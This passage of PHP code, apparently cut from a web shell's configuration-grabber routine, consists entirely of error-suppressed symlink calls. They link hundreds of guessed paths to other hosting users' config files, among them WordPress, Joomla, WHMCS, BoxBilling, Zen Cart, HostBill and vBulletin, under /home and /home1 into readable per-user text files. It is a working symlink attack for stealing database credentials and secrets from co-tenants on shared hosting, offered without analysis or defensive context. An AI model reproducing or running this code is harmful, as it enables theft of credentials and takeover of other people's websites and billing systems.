  1300. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1301. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1302. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1303. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1304. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1305. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1306. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1307. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1308. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1309. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1310. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1311. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1358. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1394. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1395. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1396. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1397. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1398. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1399. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1400. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1401. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1402. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1403. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1404. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1405. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1406. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1407. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1408. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1409. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1410. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1411. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1412. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1413. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1414. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1415. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1416. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1417. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1418. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1419. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1420. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1421. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1422. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1423. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1424. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1425. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1426. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1427. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1428. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1429. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1430. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1431. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1432. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1433. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1434. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1435.  
  1436. //Home1
  1437.  
  1438. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1439. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1440. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1441. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1442. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1443. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1444. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1445. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1446. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1447. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1448. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1449. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1450. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1451. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1452. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1453. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1454. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1455. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1456. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1457. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1458. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1459. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1460. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1461. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1462. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1463. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1464. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1465. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1466. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1467. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1468. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1469. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1470. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1471. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1472. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1473. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1474. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1475. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1476. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1477. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1478. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1479. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1480. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1481. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1482. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1483. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1484. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1485. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1486. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1577. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1578. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1579. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1580. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1581. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1582. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1583. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1584. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1585. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1586. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1587. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1588. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1589. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1590. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1591. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1592. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1593. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1594. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1595. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1596. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1597. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1598. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1599. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1600. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1601. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1602. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1603. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1604. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1605. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1606. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
